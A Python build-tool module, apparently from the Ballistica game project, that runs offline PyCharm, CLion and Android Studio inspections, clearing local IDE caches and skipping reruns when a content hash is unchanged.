iprof = Path(projroot, '.idea/inspectionProfiles/Default.xml')
if not iprof.exists():
iprof = Path(projroot, '.idea/inspectionProfiles/Project_Default.xml')
if not iprof.exists():
raise Exception('No default inspection profile found.')
cmd = [str(inspect), str(projroot), str(iprof), tmpdir.name, '-v2']
if inspectdir is not None:
cmd += ['-d', str(inspectdir)]
running = True
def heartbeat() -> None:
"""Print the time occasionally to make the log more informative."""
while running:
time.sleep(60)
print('Heartbeat', datetime.datetime.now(), flush=True)
if verbose:
import threading
print(cmd, flush=True)
threading.Thread(target=heartbeat, daemon=True).start()
result = subprocess.run(cmd, capture_output=not verbose, check=False)
running = False
if result.returncode != 0:
# In verbose mode this stuff got printed already.
if not verbose:
stdout = (
result.stdout.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
stderr = (
result.stderr.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
print(f'{displayname} inspection failure stdout:\n{stdout}' +
f'{displayname} inspection failure stderr:\n{stderr}')
raise RuntimeError(f'{displayname} inspection failed.')
files = [f for f in os.listdir(tmpdir.name) if not f.startswith('.')]
total_errors = 0
if files:
for fname in files:
total_errors += _parse_idea_results(Path(tmpdir.name, fname))
if total_errors > 0:
raise CleanError(f'{Clr.SRED}{displayname} inspection'
f' found {total_errors} error(s).{Clr.RST}')
duration = time.time() - start_time
print(
f'{Clr.GRN}{displayname} passed for {len(scripts)} files'
f' in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _run_idea_inspections_cached(cachepath: Path,
filenames: List[str],
full: bool,
projroot: Path,
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
# pylint: disable=too-many-locals
import hashlib
import json
from efro.terminal import Clr
md5 = hashlib.md5()
# Let's calc a single hash from the contents of all script files and only
# run checks when that changes. Sadly there's not much else optimization
# wise that we can easily do, but this will at least prevent re-checks when
# nothing at all has changed.
for filename in filenames:
with open(filename, 'rb') as infile:
md5.update(infile.read())
# Also hash a few .idea files so we re-run inspections when they change.
extra_hash_paths = [
Path(projroot, '.idea/inspectionProfiles/Default.xml'),
Path(projroot, '.idea/inspectionProfiles/Project_Default.xml'),
Path(projroot, '.idea/dictionaries/ericf.xml')
]
for epath in extra_hash_paths:
if os.path.exists(epath):
with open(epath, 'rb') as infile:
md5.update(infile.read())
current_hash = md5.hexdigest()
existing_hash: Optional[str]
try:
with open(cachepath) as infile2:
existing_hash = json.loads(infile2.read())['hash']
except Exception:
existing_hash = None
if full or current_hash != existing_hash:
_run_idea_inspections(projroot,
filenames,
displayname,
inspect=inspect,
verbose=verbose,
inspectdir=inspectdir)
with open(cachepath, 'w') as outfile:
outfile.write(json.dumps({'hash': current_hash}))
print(
f'{Clr.GRN}{displayname}: all {len(filenames)}'
f' files are passing.{Clr.RST}',
flush=True)
def pycharm(projroot: Path, full: bool, verbose: bool) -> None:
"""Run pycharm inspections on all our scripts."""
import time
# FIXME: Generalize this to work with at least linux, possibly windows.
cachepath = Path('config/.cache-pycharm')
filenames = get_script_filenames(projroot)
pycharmroot = Path('/Applications/PyCharm CE.app')
pycharmbin = Path(pycharmroot, 'Contents/MacOS/pycharm')
inspect = Path(pycharmroot, 'Contents/bin/inspect.sh')
# In full mode, clear out pycharm's caches first.
# It seems we need to spin up the GUI and give it a bit to
# re-cache system python for this to work...
# UPDATE: This really slows things down, so we now only do it in
# very specific cases where time isn't important.
# (such as our daily full-test-runs)
if full and os.environ.get('EFROTOOLS_FULL_PYCHARM_RECACHE') == '1':
print('Clearing PyCharm caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/PyCharmCE*',
shell=True,
check=True)
print('Launching GUI PyCharm to rebuild caches...', flush=True)
process = subprocess.Popen(str(pycharmbin))
# Wait a bit and ask it nicely to die.
# We need to make sure it has enough time to do its cache updating
# thing even if the system is fully under load.
time.sleep(10 * 60)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run(
"osascript -e 'tell application \"PyCharm CE\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI PyCharm to quit...', flush=True)
process.wait()
_run_idea_inspections_cached(cachepath=cachepath,
filenames=filenames,
full=full,
projroot=projroot,
displayname='PyCharm',
inspect=inspect,
verbose=verbose)
def clioncode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run clion inspections on all our code."""
import time
cachepath = Path('config/.cache-clioncode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/CLion.app')
clionbin = Path(clionroot, 'Contents/MacOS/clion')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
print('Clearing CLion caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/CLion*', shell=True, check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
print('Launching GUI CLion to rebuild caches...', flush=True)
process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
waittime = 120
while waittime > 0:
print(f'Waiting for {waittime} more seconds.')
time.sleep(10)
waittime -= 10
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run("osascript -e 'tell application \"CLion\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI CLion to quit...', flush=True)
process.wait(timeout=60)
print('Launching Offline CLion to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-cmake'),
inspectdir=Path(projroot, 'ballisticacore-cmake/src/ballistica'),
displayname='CLion',
inspect=inspect,
verbose=verbose)
def androidstudiocode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run Android Studio inspections on all our code."""
# import time
cachepath = Path('config/.cache-androidstudiocode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/Android Studio.app')
# clionbin = Path(clionroot, 'Contents/MacOS/studio')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
# print('Clearing Android Studio caches...', flush=True)
# subprocess.run('rm -rf ~/Library/Caches/AndroidStudio*',
# shell=True,
# check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
# print('Launching GUI CLion to rebuild caches...', flush=True)
# process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
# time.sleep(120)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
# subprocess.run(
# "osascript -e 'tell application \"Android Studio\" to quit'",
# shell=True)
# process.terminate()
# print('Waiting for GUI CLion to quit...', flush=True)
# process.wait(timeout=60)
print('Launching Offline Android Studio to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-android'),
inspectdir=Path(
projroot,
'ballisticacore-android/BallisticaCore/src/main/cpp/src/ballistica'
),
# inspectdir=None,
displayname='Android Studio',
inspect=inspect,
verbose=verbose)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.